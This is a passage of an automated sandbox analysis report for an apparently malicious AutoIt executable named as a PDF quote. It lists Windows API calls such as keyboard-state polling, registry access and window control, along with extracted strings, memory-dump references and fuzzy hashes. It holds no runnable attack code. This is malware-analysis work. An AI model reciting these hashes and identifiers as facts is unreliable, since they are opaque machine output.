                                                                    • DeleteObject.GDI32(?), ref: 00ED758E
                                                                    • DeleteDC.GDI32(00000006), ref: 00ED7595
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00ED75A0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                    • String ID: (
                                                                    • API String ID: 2598888154-3887548279
                                                                    • Opcode ID: 14c9797ed3e7a61e2bc91ec01640d5cf25874184bc0c5cfb818ddc3ede3cb672
                                                                    • Instruction ID: dab14e20e69af610215dd9060426cdeae8804cd6e3536544019f74d83ca546f1
                                                                    • Opcode Fuzzy Hash: 14c9797ed3e7a61e2bc91ec01640d5cf25874184bc0c5cfb818ddc3ede3cb672
                                                                    • Instruction Fuzzy Hash: E7516B71904249EFCB25CFA9DC85EAEBBB9EF48310F14842EF999A7310D731A945CB50
                                                                    APIs
                                                                      • Part of subcall function 00E80AD7: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E66C6C,?,00008000), ref: 00E80AF3
                                                                      • Part of subcall function 00E648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E648A1,?,?,00E637C0,?), ref: 00E648CE
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E66D0D
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E66E5A
                                                                      • Part of subcall function 00E659CD: _wcscpy.LIBCMT ref: 00E65A05
                                                                      • Part of subcall function 00E837BD: _iswctype.LIBCMT ref: 00E837C5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                    • API String ID: 537147316-1018226102
                                                                    • Opcode ID: 65b8a812a1fa288af1aa4dbd93fdf79cdcad38e0d5317cfa483153339d33b08f
                                                                    • Instruction ID: fe99292e4456acc21754e1b38d74816586cb24e2cbf925cc2b68ab0d4a3259c9
                                                                    • Opcode Fuzzy Hash: 65b8a812a1fa288af1aa4dbd93fdf79cdcad38e0d5317cfa483153339d33b08f
                                                                    • Instruction Fuzzy Hash: 8802AE311483409FCB24EF24D891AAFBBE5BF98394F04591DF5D9A32A1DB31DA49CB42
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00E645F9
                                                                    • GetMenuItemCount.USER32(00F25890), ref: 00E9D6FD
                                                                    • GetMenuItemCount.USER32(00F25890), ref: 00E9D7AD
                                                                    • GetCursorPos.USER32(?), ref: 00E9D7F1
                                                                    • SetForegroundWindow.USER32(00000000), ref: 00E9D7FA
                                                                    • TrackPopupMenuEx.USER32(00F25890,00000000,?,00000000,00000000,00000000), ref: 00E9D80D
                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E9D819
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                    • String ID:
                                                                    • API String ID: 2751501086-0
                                                                    • Opcode ID: e189377f92f18a080a1db210fdb2af2a889385bb1e1fdb38bca5d72d74332c33
                                                                    • Instruction ID: c52827108bcd5006e9e11c7dc7bfc16f480b9d2082275174bcb02a6b7e8c5747
                                                                    • Opcode Fuzzy Hash: e189377f92f18a080a1db210fdb2af2a889385bb1e1fdb38bca5d72d74332c33
                                                                    • Instruction Fuzzy Hash: B5710570644219BEEF209F55DC85FAABFA4FF05368F101216F518BA1E1C7B15C10DB91
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00ED89EC
                                                                    • CoInitialize.OLE32(00000000), ref: 00ED8A19
                                                                    • CoUninitialize.OLE32 ref: 00ED8A23
                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00ED8B23
                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00ED8C50
                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00EF2C0C), ref: 00ED8C84
                                                                    • CoGetObject.OLE32(?,00000000,00EF2C0C,?), ref: 00ED8CA7
                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00ED8CBA
                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00ED8D3A
                                                                    • VariantClear.OLEAUT32(?), ref: 00ED8D4A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                    • String ID: ,,
                                                                    • API String ID: 2395222682-1556401989
                                                                    • Opcode ID: 21c73aa3daa8940671710f00ce3c721a17acc9a1c2c0379ea54601de32d4bfd5
                                                                    • Instruction ID: 00c5ed679e65f886c4f1d3ef85952d1c2109c9c3550b1781180bca7be6830ed6
                                                                    • Opcode Fuzzy Hash: 21c73aa3daa8940671710f00ce3c721a17acc9a1c2c0379ea54601de32d4bfd5
                                                                    • Instruction Fuzzy Hash: D4C104B1608305AFC704DF64C98496AB7E9FF88348F00595EF589AB251DB71ED06CB52
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EDFE38,?,?), ref: 00EE0EBC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                    • API String ID: 3964851224-909552448
                                                                    • Opcode ID: 304a487f1ed7d1252ba6dc525d2be63471e8dab6e5aaad6d8171073fe065c9ef
                                                                    • Instruction ID: b00153d89547d28e80a29dcb96d9337cb38e06478ae8696e154a6384c0ae77f2
                                                                    • Opcode Fuzzy Hash: 304a487f1ed7d1252ba6dc525d2be63471e8dab6e5aaad6d8171073fe065c9ef
                                                                    • Instruction Fuzzy Hash: 9741A33020428A8BCF20EF11D8A19EE3361EF11354F146459FC593B252DB759DDADBA0
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E9E5F9,00000010,?,Bad directive syntax error,00EEF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00EBFAF3
                                                                    • LoadStringW.USER32(00000000,?,00E9E5F9,00000010), ref: 00EBFAFA
                                                                      • Part of subcall function 00E67F41: _memmove.LIBCMT ref: 00E67F82
                                                                    • _wprintf.LIBCMT ref: 00EBFB2D
                                                                    • __swprintf.LIBCMT ref: 00EBFB4F
                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00EBFBBE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                    • API String ID: 1506413516-4153970271
                                                                    • Opcode ID: fa5daa04e99ca1869eede6fe2bcc9b4f1d133f2e40ab1e81df9c1a29d549f8b3
                                                                    • Instruction ID: f934708c81477a8804ddb7f22e0f2caed85b8965969ebe94121e3f1d7b44a168
                                                                    • Opcode Fuzzy Hash: fa5daa04e99ca1869eede6fe2bcc9b4f1d133f2e40ab1e81df9c1a29d549f8b3
                                                                    • Instruction Fuzzy Hash: BD21E43294020EFBCF22EFA0CC56EEE7775BF14300F04546AF509720A2DA719A68DB51
                                                                    APIs
                                                                      • Part of subcall function 00E67D2C: _memmove.LIBCMT ref: 00E67D66
                                                                      • Part of subcall function 00E67A84: _memmove.LIBCMT ref: 00E67B0D
                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00EC53D7
                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00EC53ED
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EC53FE
                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00EC5410
                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00EC5421
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$_memmove
                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                    • API String ID: 2279737902-1007645807
                                                                    • Opcode ID: a7e3246d79c6aa7f8bf490021ba1569df8eb611e65ca6425ed4add9cdad36361
                                                                    • Instruction ID: 0431a8cb718293d3b78c1f7863ec92b49f00defff0f2494cca853b0217f9995f
                                                                    • Opcode Fuzzy Hash: a7e3246d79c6aa7f8bf490021ba1569df8eb611e65ca6425ed4add9cdad36361
                                                                    • Instruction Fuzzy Hash: 08110121A9012979D724F7A1DD8ADFF7BBCFB91B84F00182EB412B20D1DEA05D86C5A1
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                    • String ID: 0.0.0.0
                                                                    • API String ID: 208665112-3771769585
                                                                    • Opcode ID: 5944529cf1be61370e7f662406a3bcf10f913f57aa63fe8381b128ade1c2ea99
                                                                    • Instruction ID: be34c87f817c24bb88100175f9afaa58a899ef0eb59df4ce1644e6e69331cdaf
                                                                    • Opcode Fuzzy Hash: 5944529cf1be61370e7f662406a3bcf10f913f57aa63fe8381b128ade1c2ea99
                                                                    • Instruction Fuzzy Hash: 901105715041186FCB24B760DD8AFEA77ECDF42714F0451BAF908B60A1EF729A868750
                                                                    APIs
                                                                    • timeGetTime.WINMM ref: 00EC5021
                                                                      • Part of subcall function 00E8034A: timeGetTime.WINMM(?,75C0B400,00E70FDB), ref: 00E8034E
                                                                    • Sleep.KERNEL32(0000000A), ref: 00EC504D
                                                                    • EnumThreadWindows.USER32(?,Function_00064FCF,00000000), ref: 00EC5071
                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00EC5093
                                                                    • SetActiveWindow.USER32 ref: 00EC50B2
                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00EC50C0
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00EC50DF
                                                                    • Sleep.KERNEL32(000000FA), ref: 00EC50EA
                                                                    • IsWindow.USER32 ref: 00EC50F6
                                                                    • EndDialog.USER32(00000000), ref: 00EC5107
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                    • String ID: BUTTON
                                                                    • API String ID: 1194449130-3405671355
                                                                    • Opcode ID: 0afb4d90355b09000e114bb66675dd6fd9ea66dc2383273ab4f9846fb567d234
                                                                    • Instruction ID: 96b859c248f665f7ef21ddd6a32acf9b0cbb364456c2b06710dc4e7420b048f1
                                                                    • Opcode Fuzzy Hash: 0afb4d90355b09000e114bb66675dd6fd9ea66dc2383273ab4f9846fb567d234
                                                                    • Instruction Fuzzy Hash: 0E21C671201B4DAFE7205F31EECAF253B69EB44399B08202CF415E51B5DB329D86A762
                                                                    APIs
                                                                      • Part of subcall function 00E69997: __itow.LIBCMT ref: 00E699C2
                                                                      • Part of subcall function 00E69997: __swprintf.LIBCMT ref: 00E69A0C
                                                                    • CoInitialize.OLE32(00000000), ref: 00ECD676
                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00ECD709
                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00ECD71D
                                                                    • CoCreateInstance.OLE32(00EF2D7C,00000000,00000001,00F18C1C,?), ref: 00ECD769
                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00ECD7D8
                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00ECD830
                                                                    • _memset.LIBCMT ref: 00ECD86D
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00ECD8A9
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00ECD8CC
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00ECD8D3
                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00ECD90A
                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 00ECD90C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                    • String ID:
                                                                    • API String ID: 1246142700-0
                                                                    • Opcode ID: 71f0c70e3fd7958ccbc51f068bc8ea8b0f26250c6bc1d3e46129f018e663a327
                                                                    • Instruction ID: 09e9cfa27050953e29091785ea7958128cbdea7bde562c0bd0458b44c9cc8e9b
                                                                    • Opcode Fuzzy Hash: 71f0c70e3fd7958ccbc51f068bc8ea8b0f26250c6bc1d3e46129f018e663a327
                                                                    • Instruction Fuzzy Hash: E3B10975A00108AFDB04DFA5D988EAEBBF9EF88304B149069F909EB251DB31ED45CB50
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00EC03C8
                                                                    • SetKeyboardState.USER32(?), ref: 00EC0433
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00EC0453
                                                                    • GetKeyState.USER32(000000A0), ref: 00EC046A
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00EC0499
                                                                    • GetKeyState.USER32(000000A1), ref: 00EC04AA
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00EC04D6
                                                                    • GetKeyState.USER32(00000011), ref: 00EC04E4
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00EC050D
                                                                    • GetKeyState.USER32(00000012), ref: 00EC051B
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00EC0544
                                                                    • GetKeyState.USER32(0000005B), ref: 00EC0552
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: 79abfe851c642151cf9e8acec0b20b8bd8286c91f4a3497e1fe7b977a3a48918
                                                                    • Instruction ID: 7e405fdaec62129b9094e78e2c086eba621ce7cd44670072bdb29bd5b239cbae
                                                                    • Opcode Fuzzy Hash: 79abfe851c642151cf9e8acec0b20b8bd8286c91f4a3497e1fe7b977a3a48918
                                                                    • Instruction Fuzzy Hash: B2510B209047C49AFB35DBA48610FEEBFF45F01344F08559DD9C2661C3DA659B4DCB61
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000001), ref: 00EBC545
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00EBC557
                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00EBC5B5
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00EBC5C0
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00EBC5D2
                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00EBC626
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00EBC634
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00EBC645
                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00EBC688
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00EBC696
                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00EBC6B3
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00EBC6C0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                    • String ID:
                                                                    • API String ID: 3096461208-0
                                                                    • Opcode ID: 9beed2fe02d5380c6f08d861d2bf4e0af17c50bbb019c8dd37fc425dbca68dcc
                                                                    • Instruction ID: 5bff327261b417a7b87ff5aa9c39d13305fb74d6fa4958a27dde354058bdca32
                                                                    • Opcode Fuzzy Hash: 9beed2fe02d5380c6f08d861d2bf4e0af17c50bbb019c8dd37fc425dbca68dcc
                                                                    • Instruction Fuzzy Hash: 9B516271B00209AFDB18CFA9DD89EAEBBB6EB88710F14812DF615E7294D7709D448B50
                                                                    APIs
                                                                      • Part of subcall function 00E61B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E62036,?,00000000,?,?,?,?,00E616CB,00000000,?), ref: 00E61B9A
                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E620D3
                                                                    • KillTimer.USER32(-00000001,?,?,?,?,00E616CB,00000000,?,?,00E61AE2,?,?), ref: 00E6216E
                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00E9BE26
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E616CB,00000000,?,?,00E61AE2,?,?), ref: 00E9BE57
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E616CB,00000000,?,?,00E61AE2,?,?), ref: 00E9BE6E
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E616CB,00000000,?,?,00E61AE2,?,?), ref: 00E9BE8A
                                                                    • DeleteObject.GDI32(00000000), ref: 00E9BE9C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 641708696-0
                                                                    • Opcode ID: 543e8fd6021de674afb6f126cf24ec4f4960a8f859218b956b8452d7fa68da15
                                                                    • Instruction ID: bf2b2a996bb24216bc1c8ad47de912134c737beb0ae5402ab202e08f04560559
                                                                    • Opcode Fuzzy Hash: 543e8fd6021de674afb6f126cf24ec4f4960a8f859218b956b8452d7fa68da15
                                                                    • Instruction Fuzzy Hash: 7D61BF30541A48DFCB359F15E948B6A77F1FF40756F10A52DE642BA9B0C770A891EF80
                                                                    APIs
                                                                      • Part of subcall function 00E625DB: GetWindowLongW.USER32(?,000000EB), ref: 00E625EC
                                                                    • GetSysColor.USER32(0000000F), ref: 00E621D3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
